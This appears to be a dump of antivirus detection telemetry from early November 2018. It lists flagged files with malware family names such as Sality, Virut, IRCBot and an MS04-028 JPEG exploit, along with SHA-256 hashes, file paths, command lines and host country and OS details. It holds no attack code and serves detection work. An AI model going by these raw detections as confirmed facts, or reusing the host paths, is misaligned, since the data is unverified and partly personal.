  Row(detection=Row(filename='avscan-20181102-052526-acb9ce86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052526-ACB9CE86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061535-ae0d559d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061535-AE0D559D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060703-7d4dedf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060703-7D4DEDF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053740-624b3b55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053740-624B3B55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-105423-168fb7e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105057-F1913359\\AVSCAN-20181101-105423-168FB7E9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccuaiuabasicstubserver.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Siemens\\ace\\bin\\CCUAIUABasicStubServer.exe', filesize=200000, name='W32/Sality.AG.#M1.#R1'), hash='151cbe1c8d8bbcd6faaa3105c13ea3e6d0ad0cf556db1bf95906acafd6647232', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7144458\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141919-00f7c431', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb904b13\\AVSCAN-20181101-141541-D9A26E4C\\AVSCAN-20181101-141919-00F7C431', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Program Files\\Yamicsoft\\Windows 10 Manager\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:K3cFWmU5SEmzOD+d.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:16:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0322902f9324b20b882c9fec1eb4449503f66bd60424b8a7cb1ee452ce7dd4f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\0322902F9324B20B882C9FEC1EB4449503F66BD60424B8A7CB1EE452CE7DD4F7', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='0322902f9324b20b882c9fec1eb4449503f66bd60424b8a7cb1ee452ce7dd4f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7071800\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\documentos\\Desktop\\Baixaki_itunes_1135567989.exe', parentsize=2202824, timestamp='2018-11-01T03:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa 5s5r.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\LPA 5s5r\\LPA 5s5r.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-08-49-36.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T07:59:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154656-6621028b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154656-6621028B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:49:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155126-939b89d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155126-939B89D7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kecelakaan kerja.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\LAPORAN KECELAKAAN KERJA\\KECELAKAAN KERJA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='perubahan gaji des 2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO PERUBAHAN GAJI DES 2014\\PERUBAHAN GAJI DES 2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130128-c3753bc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6a30824\\AVSCAN-20181101-130119-C1DB8ED3\\AVSCAN-20181101-130128-C3753BC0', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T09:06:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160157-fde25ec4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160157-FDE25EC4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153649-006346b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c9c397\\AVSCAN-20181101-153555-F8D24E48\\AVSCAN-20181101-153649-006346B2', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155242-a0750ee4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155242-A0750EE4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1a2f9f519698c0279e1d45368462c09d912bf4f0c6ccf200ef8dd4390aa59b31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1A2F9F519698C0279E1D45368462C09D912BF4F0C6CCF200EF8DD4390AA59B31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1a2f9f519698c0279e1d45368462c09d912bf4f0c6ccf200ef8dd4390aa59b31', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:19:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111544-1eb1f894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111544-1EB1F894', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:15:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150117-ff874cc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd968753\\AVSCAN-20181101-150010-F7143D9A\\AVSCAN-20181101-150117-FF874CC2', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:01:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A7000\\Lenovo_A7000_S233_MT6752_6.0_(by_firmwarefile.com)\\Lenovo_A7000_S233_MT6752_6.0\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='57aa8e6c7f17c5f2f2919e97e80ed839e6e24f62858582bef3ce55fcf0e32e70', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:35:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fulku.exe', filepath='H:\\fulku.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='bd430933c9dbbb65bc5a6dd473d10318d72163aceaa9d0c5b861b4a7a32880de', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T01:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='efa19c0ffef4dcabab1e916900e1593f718317babfa369459b71b4dd13faff72', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='H:\\Lenovo\\User\\AppData\\Local\\Temp\\nsaD32D.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-01T01:50:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110514-cf375620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110514-CF375620', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DK', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:48:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='6e15f79931eef690b1e1dee229219c28f8e56310714f9b6bd56a6261ca52ea21', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:08:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D3888B29071BB352E22633C06BDB76DF35E32FF1B5F19386B7AC51711E2F7594', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111406-1248979c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111406-1248979C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:33:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:04:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gta_sa.exe', filepath='C:\\gta\\gta_sa.exe', filesize=14464000, name='W32/Sality.AT.#M1.#R1'), hash='e312c80b0dec6b2be30cdf16bb36d9b531e8cdc2857b66529677d634d5fe563a', metadata=Row(cmdline='--engine=2 --session-id=M7OwGpcfwazepKqU6QNIjL04QCDDBm0\\\\\\/sFSoayWe --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.179.200\\software_reporter_tool.exe', parentsize=13475448, timestamp='2018-11-01T23:03:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unrhino.exe', filepath='\\\\192.168.1.7\\圖檔總目錄\\備用\\CAD\\Rhinoceros 1.1 Evaluation\\UNRHINO.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='ed9c7ab34a3206cd92f9364af4984b5b4c424d4dd432e3d05b1101a5c1e7e8e5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\Cobian.exe', parentsize=720896, timestamp='2018-11-01T15:53:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.da242e32a30841df9b41a532dde38742.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.da242e32a30841df9b41a532dde38742.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='CH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T11:06:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152614-308c8992', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9dbe3609\\AVSCAN-20181101-152231-16B19880\\AVSCAN-20181101-152614-308C8992', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\grosvenorcasinompp\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\grosvenorcasinompp\\mppoker.exe', parentsize=1214712, timestamp='2018-11-01T18:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='office volume activation script for z.w.t keygen.rar', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Office 2010 (New) Professional Plus 32bit and 64bit with Volume Edition Activator_timesurfer\\Office Volume Activation Script for Z.W.T Keygen.rar', filesize=284000, name='BDS/Bot.140827.#M1.#R1'), hash='d8cc74b15b4bc6301d90d96b73b55f6ff459468ba2cb096e441539950ff20d8b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:10Z'), dt=datetime.date(2018, 11, 1)),
